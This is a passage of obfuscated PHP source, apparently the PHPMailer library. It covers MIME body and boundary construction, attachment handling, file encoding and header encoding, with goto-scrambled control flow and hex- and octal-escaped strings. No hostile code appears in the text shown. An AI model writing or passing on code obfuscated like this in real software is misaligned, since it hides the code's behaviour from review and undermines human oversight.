$this->boundary[1]); goto S60km; S60km: $body .= $this->headerLine("\x43\x6f\156\164\145\156\164\x2d\124\x79\x70\x65", "\x6d\165\x6c\x74\x69\x70\x61\162\x74\57\162\x65\x6c\141\164\x65\x64\73"); goto TkZ3s; dAcEf: $body .= $this->encodeString($this->Body, $bodyEncoding); goto N001h; EiP3e: $body .= $this->attachAll("\141\x74\x74\141\143\x68\155\x65\156\x74", $this->boundary[1]); goto KGUav; vZPbF: $body .= $mimepre; goto D4p2a; eQMvR: $body .= $this->LE; goto EiP3e; KGUav: goto QvhDd; goto JYaHP; N001h: $body .= $this->LE . $this->LE; goto p65M6; YUYX_: $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding); goto dAcEf; JYaHP: case "\x61\x6c\x74": goto RE48b; RE48b: $body .= $mimepre; goto oD2Q6; d4MGg: $body .= $this->encodeString($this->Ical, $this->Encoding); goto rGTt3; rJXjn: $body .= $this->endBoundary($this->boundary[1]); goto SSoMD; ZdVEg: $body .= $this->encodeString($this->Body, $bodyEncoding); goto wU0Io; ZARhU: $body .= $this->getBoundary($this->boundary[1], '', "\164\145\x78\164\x2f\x63\141\x6c\145\x6e\144\141\162\x3b\x20\155\145\164\x68\x6f\144\75\122\105\121\x55\x45\123\124", ''); goto d4MGg; xSXqy: dQmMH: goto rJXjn; rGTt3: $body .= $this->LE . $this->LE; goto xSXqy; SuTM1: $body .= $this->LE . $this->LE; goto Hj6xp; v7Q7Q: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto SuTM1; SSoMD: goto QvhDd; goto YG6LW; wU0Io: $body .= $this->LE . $this->LE; goto dO4Ta; oD2Q6: $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, "\164\x65\170\164\x2f\160\x6c\x61\x69\156", $altBodyEncoding); goto v7Q7Q; Hj6xp: $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, "\164\x65\170\x74\x2f\x68\164\155\x6c", $bodyEncoding); goto ZdVEg; dO4Ta: if (empty($this->Ical)) { goto dQmMH; } goto ZARhU; YG6LW: case "\141\154\x74\x5f\x69\156\x6c\151\x6e\x65": goto aAqsx; Zu_uw: goto QvhDd; goto u0imD; o9dy3: $body .= $this->textLine("\x2d\55" . $this->boundary[1]); goto eMVsv; D4yud: $body .= $this->encodeString($this->Body, $bodyEncoding); goto FAlUM; uC5TM: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto xNvTh; MBfUg: $body .= $this->textLine("\11\142\157\165\156\x64\x61\x72\171\x3d\42" . $this->boundary[2] . "\42"); goto XLkWy; k44MT: $body .= $this->LE; goto iINLx; iINLx: $body .= $this->endBoundary($this->boundary[1]); goto Zu_uw; aAqsx: $body .= $mimepre; goto fjxQP; vcPsN: $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, "\x74\145\170\164\57\x68\x74\155\x6c", $bodyEncoding); goto D4yud; eMVsv: $body .= $this->headerLine("\103\157\156\x74\145\x6e\x74\x2d\124\171\x70\x65", "\x6d\165\154\x74\151\x70\x61\162\164\x2f\162\145\154\x61\x74\x65\144\73"); goto MBfUg; fjxQP: $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, "\164\145\x78\164\x2f\x70\154\141\x69\x6e", $altBodyEncoding); goto uC5TM; QDkHd: $body .= $this->attachAll("\x69\156\154\151\156\x65", $this->boundary[2]); goto k44MT; XLkWy: $body .= $this->LE; goto vcPsN; xNvTh: $body .= $this->LE . $this->LE; goto o9dy3; FAlUM: $body .= $this->LE . $this->LE; goto QDkHd; u0imD: case "\x61\154\x74\137\141\x74\x74\x61\143\150": goto zVW5I; haqJl: $body .= $this->endBoundary($this->boundary[2]); goto kQSDf; iF1eU: $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, "\164\145\170\164\x2f\160\x6c\141\151\156", $altBodyEncoding); goto vkotL; Pl3EV: $body .= $this->textLine("\x2d\x2d" . $this->boundary[1]); goto kMRvd; zVW5I: $body .= $mimepre; goto Pl3EV; kQSDf: $body .= $this->LE; goto U1heM; M3P64: goto QvhDd; goto GvTgj; ymuMn: $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, "\x74\145\170\x74\57\150\x74\x6d\154", $bodyEncoding); goto xF8Mq; tF2Vl: $body .= $this->textLine("\x9\x62\x6f\165\x6e\144\141\x72\x79\x3d\42" . $this->boundary[2] . "\42"); goto tf1p8; kMRvd: $body .= $this->headerLine("\x43\x6f\156\x74\x65\x6e\164\x2d\124\171\x70\x65", "\155\x75\x6c\164\151\x70\x61\x72\x74\x2f\141\154\164\x65\162\x6e\141\164\151\x76\145\73"); goto tF2Vl; tf1p8: $body .= $this->LE; goto iF1eU; U1heM: $body .= $this->attachAll("\x61\x74\x74\x61\x63\150\155\x65\x6e\164", $this->boundary[1]); goto M3P64; uXlGv: $body .= $this->LE . $this->LE; goto haqJl; vkotL: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto PVJhc; xF8Mq: $body .= $this->encodeString($this->Body, $bodyEncoding); goto uXlGv; PVJhc: $body .= $this->LE . $this->LE; goto ymuMn; GvTgj: case "\141\154\x74\137\151\156\154\151\x6e\x65\137\141\164\x74\141\x63\150": goto g4e8v; kOjuI: $body .= $this->encodeString($this->Body, $bodyEncoding); goto iliEh; wtvpa: $body .= $this->headerLine("\103\x6f\x6e\164\x65\156\164\55\124\171\x70\145", "\x6d\165\154\164\x69\x70\x61\x72\164\x2f\x61\154\x74\x65\x72\x6e\141\164\151\166\x65\73"); goto iQzgT; DpSs3: $body .= $this->LE; goto HuXsA; WKcyN: $body .= $this->LE; goto wq4sy; PGfoZ: $body .= $this->LE . $this->LE; goto zs03x; iQzgT: $body .= $this->textLine("\11\x62\157\x75\156\144\141\x72\171\75\42" . $this->boundary[2] . "\x22"); goto WKcyN; HuXsA: $body .= $this->getBoundary($this->boundary[3], $bodyCharSet, "\x74\x65\x78\164\x2f\x68\x74\155\154", $bodyEncoding); goto kOjuI; wq4sy: $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, "\164\x65\x78\164\57\x70\154\x61\151\x6e", $altBodyEncoding); goto bkDoP; iliEh: $body .= $this->LE . $this->LE; goto jCu5d; g4e8v: $body .= $mimepre; goto ATWyO; ATWyO: $body .= $this->textLine("\x2d\55" . $this->boundary[1]); goto wtvpa; TJqW7: $body .= $this->LE; goto pNWzi; s1ELv: $body .= $this->endBoundary($this->boundary[2]); goto TJqW7; oiBcr: $body .= $this->headerLine("\x43\157\156\164\145\156\164\x2d\x54\171\160\145", "\x6d\165\154\x74\x69\160\141\162\x74\57\x72\145\154\141\164\145\144\73"); goto CmIjS; zs03x: $body .= $this->textLine("\x2d\x2d" . $this->boundary[2]); goto oiBcr; pNWzi: $body .= $this->attachAll("\x61\164\164\x61\x63\x68\155\x65\156\164", $this->boundary[1]); goto LNwpw; CmIjS: $body .= $this->textLine("\11\142\157\x75\x6e\144\x61\x72\x79\x3d\x22" . $this->boundary[3] . "\42"); goto DpSs3; jCu5d: $body .= $this->attachAll("\151\x6e\x6c\x69\x6e\145", $this->boundary[3]); goto SIwkn; SIwkn: $body .= $this->LE; goto s1ELv; LNwpw: goto QvhDd; goto FsTTh; bkDoP: $body .= $this->encodeString($this->AltBody, $altBodyEncoding); goto PGfoZ; FsTTh: default: goto XXFBN; XXFBN: $this->Encoding = $bodyEncoding; goto lLg92; OtDrs: goto QvhDd; goto zGLz7; lLg92: $body .= $this->encodeString($this->Body, $this->Encoding); goto OtDrs; zGLz7: } goto td2MR; bQrQT: if (!("\x62\x61\163\x65\66\64" != $this->Encoding and self::hasLineLongerThanMax($this->Body))) { goto imvJW; } goto tfkHz; X7n2r: $this->boundary[3] = "\142\63\137" . $this->uniqueid; goto DHIMj; Zp11q: $bodyCharSet = "\165\x73\x2d\x61\163\143\151\151"; goto uC31z; uC31z: mArpb: goto bQrQT; CnDBO: Db5FO: goto TbUIO; C0EiT: $this->boundary[1] = "\142\61\x5f" . $this->uniqueid; goto k5nsd; BOc3d: $body .= $this->getMailMIME() . $this->LE; goto DWVCn; MUCXI: ISJs3: goto S3JOq; S3JOq: $mimepre = "\x54\x68\151\x73\40\151\163\40\141\x20\x6d\x75\x6c\164\x69\55\160\141\162\x74\x20\x6d\x65\x73\x73\141\147\145\40\x69\156\40\115\x49\x4d\105\x20\x66\157\x72\x6d\x61\x74\x2e" . $this->LE . $this->LE; goto AJsor; RW6Bu: $body = ''; goto t2081; dEPDV: $this->setWordWrap(); goto z2KFf; tXBFK: hc1eT: goto RW6Bu; Im9Y_: QoBBl: goto ykuFg; ykuFg: if (!("\x62\x61\163\145\x36\64" != $altBodyEncoding and self::hasLineLongerThanMax($this->AltBody))) { goto ISJs3; } goto CGQqJ; YwDyh: goto tKGMh; goto tXBFK; CN2gP: tKGMh: goto pB30J; a7kM3: $this->uniqueid = $this->generateId(); goto C0EiT; kRxGD: $altBodyEncoding = "\x37\142\x69\164"; goto MRCrr; t2081: goto tKGMh; goto CnDBO; McI5k: } protected function getBoundary($boundary, $charSet, $contentType, $encoding) { goto L8I5y; ym7FT: if (!($encoding == '')) { goto ratm_; } goto kYSGj; jyByG: ratm_: goto r_Yux; L8I5y: $result = ''; goto L2oQ5; K6VsM: return $result; goto ZQXFc; kllXr: r3482: goto ym7FT; x7QYv: OljJx: goto LcA1x; kYSGj: $encoding = $this->Encoding; goto jyByG; LcA1x: if (!($contentType == '')) { goto r3482; } goto GBW1G; CMqYN: $result .= sprintf("\103\x6f\x6e\x74\145\x6e\164\55\x54\171\x70\x65\x3a\40\x25\x73\73\x20\143\x68\x61\162\163\145\x74\x3d\x25\163", $contentType, $charSet); goto pduqX; GBW1G: $contentType = $this->ContentType; goto kllXr; xdPIR: $result .= $this->LE; goto K6VsM; tK12Q: $charSet = $this->CharSet; goto x7QYv; sVmr3: cFffu: goto xdPIR; vpqcA: if (!($encoding != "\x37\x62\151\164")) { goto cFffu; } goto aVyzX; aVyzX: $result .= $this->headerLine("\103\157\x6e\164\145\x6e\164\x2d\124\x72\141\x6e\x73\x66\x65\162\x2d\x45\156\143\157\x64\x69\156\147", $encoding); goto sVmr3; r_Yux: $result .= $this->textLine("\x2d\x2d" . $boundary); goto CMqYN; L2oQ5: if (!($charSet == '')) { goto OljJx; } goto tK12Q; pduqX: $result .= $this->LE; goto vpqcA; ZQXFc: } protected function endBoundary($boundary) { return $this->LE . "\x2d\x2d" . $boundary . "\55\x2d" . $this->LE; } protected function setMessageType() { goto sqmFU; LSHig: $this->message_type = "\x70\x6c\x61\151\x6e"; goto Q3Zbi; ywAdw: $type[] = "\x61\x74\164\141\x63\150"; goto cMrsb; ckbnV: if (!$this->alternativeExists()) { goto OZuZn; } goto dR8HB; sqmFU: $type = array(); goto ckbnV; V51Kk: if (!$this->attachmentExists()) { goto zuNme; } goto ywAdw; fKYwK: if (!$this->inlineImageExists()) { goto jI_J5; } goto VC6j1; YGTws: OZuZn: goto fKYwK; VC6j1: $type[] = "\151\x6e\154\x69\156\x65"; goto VHrRU; dR8HB: $type[] = "\x61\x6c\x74"; goto YGTws; VHrRU: jI_J5: goto V51Kk; yp_C7: $this->message_type = implode("\x5f", $type); goto HUPTR; HUPTR: if (!($this->message_type == '')) { goto Tfnuj; } goto LSHig; Q3Zbi: Tfnuj: goto x0FJC; cMrsb: zuNme: goto yp_C7; x0FJC: } public function headerLine($name, $value) { return $name . "\72\x20" . $value . $this->LE; } public function textLine($value) { return $value . $this->LE; } public function addAttachment($path, $name = '', $encoding = "\142\141\163\145\66\64", $type = '', $disposition = "\x61\164\x74\141\143\x68\x6d\145\x6e\164") { try { goto Dpi04; zAy56: $filename = basename($path); goto VADrp; Kqdka: $name = $filename; goto XzMhd; XzMhd: LIQyV: goto sUbZm; qjnDQ: tGVoB: goto zAy56; sUbZm: $this->attachment[] = array(0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => $disposition, 7 => 0); goto BhIZz; hT6e0: $type = self::filenameToType($path); goto qjnDQ; Xn6TP: if (!($type == '')) { goto tGVoB; } goto hT6e0; dN0M0: b5Fuv: goto Xn6TP; VADrp: if (!($name == '')) { goto LIQyV; } goto Kqdka; Dpi04: if (!(!self::isPermittedPath($path) or !@is_file($path))) { goto b5Fuv; } goto oWxAS; oWxAS: throw new phpmailerException($this->lang("\146\151\154\x65\x5f\x61\143\x63\145\x73\x73") . $path, self::STOP_CONTINUE); goto dN0M0; BhIZz: } catch (phpmailerException $exc) { goto hMxdm; VLj2O: return false; goto yV0ju; s0xRO: if (!$this->exceptions) { goto AWBQZ; } goto dqU3V; hMxdm: $this->setError($exc->getMessage()); goto k5lGe; k5lGe: $this->edebug($exc->getMessage()); goto s0xRO; jkRbD: AWBQZ: goto VLj2O; dqU3V: throw $exc; goto jkRbD; yV0ju: } return true; } public function getAttachments() { return $this->attachment; } protected function attachAll($disposition_type, $boundary) { goto s2Lig; QAzJ3: $mime[] = sprintf("\x2d\x2d\x25\x73\55\x2d\x25\163", $boundary, $this->LE); goto h1SBg; s2Lig: $mime = array(); goto pI2Pt; pVFUt: foreach ($this->attachment as $attachment) { goto rEGS3; jgOAZ: a1dX7: goto Ed1is; O0KUv: if (!empty($encoded_name)) { goto L71Fl; } goto PUUMg; UNgMW: $bString = $attachment[5]; goto FoinJ; UH34u: ouvm5: goto L5j1q; iXijA: $type = $attachment[4]; goto Q9IRP; IAQ3H: if (!empty($disposition)) { goto a1dX7; } goto ra8nR; Gy7t5: $mime[] = sprintf("\x43\157\x6e\x74\x65\156\x74\x2d\104\x69\x73\x70\x6f\x73\151\164\x69\157\x6e\x3a\x20\45\x73\73\x20\x66\x69\154\145\156\141\155\145\x3d\42\x25\x73\x22\45\163", $disposition, $encoded_name, $this->LE . $this->LE); goto XG1q8; Ed1is: $encoded_name = $this->encodeHeader($this->secureHeader($name)); goto K7MVe; ul0ky: $string = ''; goto f4H9W; pPp3w: $mime[] = $this->LE . $this->LE; goto izYVu; efHOM: goto Iad1R; goto PBlxg; L5j1q: if ($bString) { goto ZmigP; } goto UxIbq; izYVu: wVWQC: goto XNME5; YFkxm: if (!empty($name)) { goto ZlURs; } goto Zrc3D; FoinJ: if ($bString) { goto UTPIw; } goto l7HUr; f4H9W: $path = ''; goto UNgMW; KKrol: goto Iad1R; goto d51tf; Ruvf8: $inclhash = md5(serialize($attachment)); goto jMRTw; bjUpk: Ppc1n: goto iU_kY; MchXp: if (!($disposition == "\151\156\x6c\151\x6e\145")) { goto Kryfg; } goto r9pOz; NShWq: $mime[] = sprintf("\x43\x6f\156\164\x65\156\x74\x2d\124\162\x61\x6e\x73\146\x65\x72\x2d\105\x6e\x63\x6f\x64\x69\156\x67\x3a\x20\45\163\x25\163", $encoding, $this->LE); goto HvStl; PBlxg: IJRVn: goto gDksC; HgnQy: if (!$this->isError()) { goto Ppc1n; } goto C1wHc; W7yAM: ZlURs: goto Y_2Wq; bQmYj: goto QPPuw; goto LeNRM; XNME5: vcSAx: goto qmRfm; LidPh: G6EFb: goto Gy7t5; zSuKC: MsA5j: goto ZKdUD; OC9v2: $cidUniq[$cid] = true; goto N8IOb; rEGS3: if (!($attachment[6] == $disposition_type)) { goto vcSAx; } goto ul0ky; aaJLa: $mime[] = sprintf("\103\157\156\164\x65\156\164\x2d\104\151\163\160\x6f\163\x69\x74\151\157\x6e\72\x20\45\163\x3b\x20\146\x69\154\145\156\x61\155\145\x3d\x25\x73\45\163", $disposition, $encoded_name, $this->LE . $this->LE); goto hrvKY; Q9IRP: $disposition = $attachment[6]; goto eKOPh; UdZll: if (!$this->isError()) { goto FbBVb; } goto IB0BM; mXZ2C: goto ouvm5; goto jgOAZ; gnFxg: goto p5uUf; goto LidPh; XG1q8: p5uUf: goto UH34u; qmRfm: Iad1R: goto lmuqD; Ab580: if (!($disposition == "\x69\156\x6c\151\x6e\145" && array_key_exists($cid, $cidUniq))) { goto E4P79; } goto KKrol; aqDvd: $encoding = $attachment[3]; goto iXijA; M3pRS: $string = $attachment[0]; goto C_8z4; C1wHc: return ''; goto bjUpk; Y_2Wq: $mime[] = sprintf("\103\x6f\x6e\164\x65\x6e\164\55\x54\x79\160\145\72\x20\45\x73\73\x20\156\141\x6d\x65\75\42\45\x73\42\45\163", $type, $this->encodeHeader($this->secureHeader($name)), $this->LE); goto zSuKC; Zrc3D: $mime[] = sprintf("\x43\157\x6e\164\145\x6e\164\55\124\x79\x70\145\x3a\x20\45\x73\45\163", $type, $this->LE); goto VyUN6; tQsiH: FbBVb: goto pPp3w; PUUMg: $mime[] = sprintf("\x43\157\x6e\x74\145\156\164\55\104\x69\163\160\157\x73\151\x74\151\157\156\x3a\40\x25\x73\x25\x73", $disposition, $this->LE . $this->LE); goto bQmYj; d51tf: E4P79: goto OC9v2; VyUN6: goto MsA5j; goto W7yAM; ZKdUD: if (!($encoding != "\x37\x62\151\x74")) { goto q2lHX; } goto NShWq; NjOgE: Kryfg: goto IAQ3H; iU_kY: $mime[] = $this->LE . $this->LE; goto SI0Ge; liI8r: UTPIw: goto M3pRS; K7MVe: if (preg_match("\57\133\40\x5c\x28\x5c\51\74\x3e\100\54\x3b\72\134\x22\134\57\x5c\x5b\134\135\x5c\77\x3d\x5d\x2f", $encoded_name)) { goto G6EFb; } goto O0KUv; IB0BM: return ''; goto tQsiH; enPVK: ZmigP: goto UcuR2; C_8z4: q04pp: goto Ruvf8; uG37i: goto q04pp; goto liI8r; N8IOb: $mime[] = sprintf("\55\55\x25\163\x25\163", $boundary, $this->LE); goto YFkxm; UCxSs: $name = $attachment[2]; goto aqDvd; eKOPh: $cid = $attachment[7]; goto Ab580; LeNRM: L71Fl: goto aaJLa; UxIbq: $mime[] = $this->encodeFile($path, $encoding); goto HgnQy; ra8nR: $mime[] = $this->LE; goto mXZ2C; HvStl: q2lHX: goto MchXp; r9pOz: $mime[] = sprintf("\103\x6f\x6e\x74\x65\x6e\x74\55\x49\104\x3a\40\74\x25\163\x3e\45\x73", $cid, $this->LE); goto NjOgE; UcuR2: $mime[] = $this->encodeString($string, $encoding); goto UdZll; l7HUr: $path = $attachment[0]; goto uG37i; SI0Ge: goto wVWQC; goto enPVK; hrvKY: QPPuw: goto gnFxg; jMRTw: if (!in_array($inclhash, $incl)) { goto IJRVn; } goto efHOM; gDksC: $incl[] = $inclhash; goto UCxSs; lmuqD: } goto jLXkU; h1SBg: return implode('', $mime); goto UoL5Q; u8b9E: $incl = array(); goto pVFUt; jLXkU: MUsg0: goto QAzJ3; pI2Pt: $cidUniq = array(); goto u8b9E; UoL5Q: } protected function encodeFile($path, $encoding = "\x62\x61\x73\x65\x36\x34") { try { goto C692e; UWtXc: ini_set("\x6d\141\x67\x69\x63\x5f\x71\165\157\164\x65\163\137\x72\x75\156\164\x69\155\145", $magic_quotes); goto iruGL; dU0y5: e_jYa: goto fxkG4; NXdYb: nhTX5: goto OTZWx; eX52K: vubee: goto TqFIK; O3Vk_: if (!version_compare(PHP_VERSION, "\67\x2e\64\56\x30", "\x3c")) { goto NzUFr; } goto OVZHY; C692e: if (!(!self::isPermittedPath($path) or !file_exists($path))) { goto e696H; } goto sfCGX; p_xPg: if (version_compare(PHP_VERSION, "\x35\56\x33\x2e\60", "\74")) { goto e_jYa; } goto f_jED; iruGL: goto ibito; goto eX52K; a21ja: if (version_compare(PHP_VERSION, "\x35\56\x33\x2e\60", "\x3c")) { goto vubee; } goto UWtXc; RglMT: ibito: goto P_jWI; TqFIK: set_magic_quotes_runtime($magic_quotes); goto RglMT; am7dd: $magic_quotes = false; goto O3Vk_; sfCGX: throw new phpmailerException($this->lang("\x66\x69\x6c\145\x5f\x6f\x70\145\156") . $path, self::STOP_CONTINUE); goto mOEwS; gYgha: return $file_buffer; goto iVLU0; OTZWx: P7bgw: goto Rsv6m; CfQ2K: $file_buffer = $this->encodeString($file_buffer, $encoding); goto esbF3; f_jED: ini_set("\x6d\x61\x67\x69\143\137\x71\x75\157\x74\x65\163\137\x72\x75\156\x74\x69\x6d\145", false); goto en1Sn; esbF3: if (!$magic_quotes) { goto JMmp1; } goto a21ja; mOEwS: e696H: goto am7dd; Rsv6m: $file_buffer = file_get_contents($path); goto CfQ2K; fxkG4: set_magic_quotes_runtime(false); goto NXdYb; P_jWI: JMmp1: goto gYgha; OVZHY: $magic_quotes = get_magic_quotes_runtime(); goto fJvnu; en1Sn: goto nhTX5; goto dU0y5; fJvnu: NzUFr: goto USHyY; USHyY: if (!$magic_quotes) { goto P7bgw; } goto p_xPg; iVLU0: } catch (Exception $exc) { $this->setError($exc->getMessage()); return ''; } } public function encodeString($str, $encoding = "\x62\141\163\x65\x36\64") { goto A8lbi; JN2jk: Xgat0: goto IbiwT; ZomFO: return $encoded; goto xmwDv; IbiwT: mnrSC: goto ZomFO; A8lbi: $encoded = ''; goto BGK43; BGK43: switch (strtolower($encoding)) { case "\142\x61\x73\x65\66\x34": $encoded = chunk_split(base64_encode($str), 76, $this->LE); goto mnrSC; case "\67\142\151\x74": case "\x38\x62\151\164": goto TlS1J; cNazp: eWR7u: goto YqaB_; YqaB_: goto mnrSC; goto a91Gg; aZyTx: if (!(substr($encoded, -strlen($this->LE)) != $this->LE)) { goto eWR7u; } goto EeGDm; EeGDm: $encoded .= $this->LE; goto cNazp; TlS1J: $encoded = $this->fixEOL($str); goto aZyTx; a91Gg: case "\x62\x69\156\x61\x72\171": $encoded = $str; goto mnrSC; case "\161\x75\157\164\145\x64\x2d\160\x72\x69\156\164\x61\x62\154\x65": $encoded = $this->encodeQP($str); goto mnrSC; default: $this->setError($this->lang("\x65\x6e\x63\157\144\151\156\x67") . $encoding); goto mnrSC; } goto JN2jk; xmwDv: } public function encodeHeader($str, $position = "\164\145\170\x74") { goto c8eW7; X8Hsx: if ($matchcount > strlen($str) / 3) { goto asFkE; } goto p8OfV; XLLG6: $maxlen = 75 - 7 - strlen($this->CharSet); goto X8Hsx; r3x1V: $encoded = base64_encode($str); goto m6QUu; vKdVZ: $encoded = preg_replace("\57\136\50\56\x2a\x29\44\x2f\155", "\x20\75\x3f" . $this->CharSet . "\x3f{$encoding}\x3f\x5c\x31\x3f\75", $encoded); goto pLDvp; hWqUv: if (!($matchcount == 0)) { goto dD8sJ; } goto SWhn3; m6QUu: $maxlen -= $maxlen % 4; goto e3Cs6; NbLIf: if (function_exists("\155\x62\x5f\163\x74\162\x6c\145\x6e") && $this->hasMultiBytes($str)) { goto y8cqb; } goto r3x1V; WYyCK: $encoded = $this->encodeQ($str, $position); goto GH09k; SWhn3: return $str; goto OBP29; hNNYg: asFkE: goto xc_0F; zd9Kg: SgQ56: goto hWqUv; qB32F: iOhN4: goto vKdVZ; mztd_: Hk9HN: goto qB32F; GH09k: $encoded = $this->wrapText($encoded, $maxlen, true); goto YkhGA; tCWqh: switch (strtolower($position)) { case "\160\150\162\141\x73\145": goto a2Yd6; r2dgL: goto BVLAI; goto YKRdd; z2hGq: $matchcount = preg_match_all("\57\133\136\134\60\64\60\x5c\x30\x34\x31\x5c\60\64\x33\55\134\x31\x33\x33\x5c\61\x33\65\55\134\x31\x37\x36\135\x2f", $str, $matches); goto g6mlu; YKRdd: xZ3Pp: goto mK1eK; u2Rwo: DYhQI: goto z2hGq; g6mlu: goto SgQ56; goto eIu90; Ng9BY: return "\42{$encoded}\x22"; goto r2dgL; q10Dh: if ($str == $encoded && !preg_match("\57\x5b\136\101\55\x5a\x61\55\172\60\55\x39\x21\x23\x24\45\x26\47\x2a\x2b\x5c\x2f\75\77\x5e\x5f\x60\x7b\174\175\176\x20\x2d\135\57", $str)) { goto xZ3Pp; } goto Ng9BY; vkJPF: BVLAI: goto u2Rwo; mK1eK: return $encoded; goto vkJPF; a2Yd6: if (preg_match("\x2f\133\x5c\62\60\60\55\x5c\63\x37\67\x5d\x2f", $str)) { goto DYhQI; } goto s54Fe; s54Fe: $encoded = addcslashes($str, "\x0\x2e\56\x1f\177\x5c\42"); goto q10Dh; eIu90: case "\x63\x6f\x6d\x6d\x65\x6e\164": $matchcount = preg_match_all("\57\x5b\x28\x29\42\x5d\57", $str, $matches); case "\x74\145\x78\x74": default: $matchcount += preg_match_all("\57\x5b\134\x30\x30\x30\x2d\x5c\60\x31\60\134\x30\61\63\x5c\x30\x31\64\134\x30\61\66\x2d\134\x30\x33\67\x5c\x31\x37\67\x2d\x5c\63\x37\67\x5d\57", $str, $matches); goto SgQ56; } goto Xr2FP; YkhGA: $encoded = str_replace("\x3d" . self::CRLF, "\12", trim($encoded)); goto n0my0; ezQGc: y8cqb: goto LwmjV; p8OfV: $encoding = "\x51"; goto WYyCK; e3Cs6: $encoded = trim(chunk_split($encoded, $maxlen, "\12")); goto dY5HC; dY5HC: goto Hk9HN; goto ezQGc; OBP29: dD8sJ: goto XLLG6; fq7zh: return $encoded; goto Bwc96; n0my0: goto iOhN4; goto hNNYg; Xr2FP: AxUUc: goto zd9Kg; c8eW7: $matchcount = 0; goto tCWqh; pLDvp: $encoded = trim(str_replace("\12", $this->LE, $encoded)); goto fq7zh; xc_0F: $encoding = "\x42"; goto NbLIf; LwmjV: $encoded = $this->base64EncodeWrapMB($str, "\12"); goto mztd_; Bwc96: } public function hasMultiBytes($str) { goto E5FNo; qkj3o: return false; goto aTaBV; VauAj: aOOWl: goto xK12n; aTaBV: goto ig9B3; goto VauAj; ZuwBB: ig9B3: goto oC1Dn; xK12n: return strlen($str) > mb_strlen($str, $this->CharSet); goto ZuwBB; E5FNo: if (function_exists("\155\x62\x5f\163\164\162\154\145\156")) { goto aOOWl; } goto qkj3o; oC1Dn: } public function has8bitChars($text) { return (bool) preg_match("\x2f\133\x5c\170\70\x30\55\134\170\106\x46\x5d\57", $text); } public function base64EncodeWrapMB($str, $linebreak = null) { goto YcVWs; dCATo: if (!($linebreak === null)) { goto gG2Ym; } goto tByzp; YcVWs: $start = "\x3d\x3f" . $this->CharSet . "\77\102\x3f"; goto JyAqZ; vc0Fl: $chunk = mb_substr($str, $i, $offset, $this->CharSet); goto hJX3F; SmHHo: kndvk: goto I38ZV; Rl2aw: $encoded = ''; goto dCATo; UFO2U: $lookBack++; goto ef9aM; yfqvP: xZdqo: goto oP25c; hJX3F: $chunk = base64_encode($chunk); goto UFO2U; RjbEa: $mb_length = mb_strlen($str, $this->CharSet); goto vSaF0; A1mPe: $lookBack = 0; goto UKfUw; ylnn7: $encoded = substr($encoded, 0, -strlen($linebreak)); goto tZbkl; vSaF0: $length = 75 - strlen($start) - strlen($end); goto gfVDJ; WLgET: $encoded .= $chunk . $linebreak; goto yfqvP; O_Cae: gG2Ym: goto RjbEa; vuEPG: e5x88: goto ylnn7; onQBO: $avgLength = floor($length * $ratio * 0.75); goto EUkRV; ef9aM: if (strlen($chunk) > $length) { goto RrYMD; } goto jFXPg; JYoS6: $offset = $avgLength - $lookBack; goto vc0Fl; UKfUw: RrYMD: goto JYoS6; FXzPl: goto kndvk; goto vuEPG; gfVDJ: $ratio = $mb_length / strlen($str); goto onQBO; I38ZV: if (!($i < $mb_length)) { goto e5x88; } goto A1mPe; JyAqZ: $end = "\77\x3d"; goto Rl2aw; EUkRV: $i = 0; goto SmHHo; tByzp: $linebreak = $this->LE; goto O_Cae; tZbkl: return $encoded; goto F7y2_; oP25c: $i += $offset; goto FXzPl; jFXPg: QokIg: goto WLgET; F7y2_: } public function encodeQP($string, $line_max = 76) { goto iFgbr; VfAsz: $string = str_replace(array("\45\62\x30", "\x25\60\104\x25\60\x41\x2e", "\x25\60\104\x25\60\x41", "\x25"), array("\40", "\15\12\x3d\62\105", "\xd\12", "\x3d"), rawurlencode($string)); goto E69JA; GXVKI: Nm2KQ: goto VfAsz; iFgbr: if (!function_exists("\161\165\157\164\x65\x64\x5f\x70\162\x69\x6e\164\x61\142\154\145\x5f\145\156\143\x6f\x64\145")) { goto Nm2KQ; } goto N46fw; N46fw: return quoted_printable_encode($string); goto GXVKI; E69JA: return preg_replace("\x2f\133\x5e\134\162\134\x6e\135\x7b" . ($line_max - 3) . "\x7d\133\136\75\134\162\x5c\156\x5d\173\62\175\57", "\44\x30\x3d\15\xa", $string); goto V2JqY; V2JqY: } public function encodeQPphp($string, $line_max = 76, $space_conv = false) { return $this->encodeQP($string, $line_max); } public function encodeQ($str, $position = "\164\145\170\x74") { goto h4Ld7; Mw6Lb: Xu7V1: goto OytF2; d6UhM: $matches = array(); goto R82RD; R82RD: if (!preg_match_all("\x2f\x5b{$pattern}\x5d\x2f", $encoded, $matches)) { goto DNQ0w; } goto Noi4B; XJj60: if (!(false !== $eqkey)) { goto Xu7V1; } goto OiV_I; Noi4B: $eqkey = array_search("\75", $matches[0]); goto XJj60; OHlWi: DNQ0w: goto iBD5e; P2OFt: $encoded = str_replace(array("\xd", "\xa"), '', $str); goto s0paU; OytF2: foreach (array_unique($matches[0]) as $char) { $encoded = str_replace($char, "\75" . sprintf("\x25\x30\x32\x58", ord($char)), $encoded); t5G4y: } goto oN9yC; i08e6: JK0_8: goto d6UhM; XsvkS: array_unshift($matches[0], "\x3d"); goto Mw6Lb; h4Ld7: $pattern = ''; goto P2OFt; xpHvf: CNOFL: goto i08e6; oN9yC: EYTpx: goto OHlWi; s0paU: switch (strtolower($position)) { case "\160\x68\162\x61\x73\x65": $pattern = "\136\x41\x2d\x5a\x61\x2d\x7a\60\55\x39\x21\52\x2b\x5c\x2f\40\x2d"; goto JK0_8; case "\143\x6f\x6d\x6d\x65\x6e\x74": $pattern = "\134\x28\134\x29\42"; case "\164\145\170\164": default: $pattern = 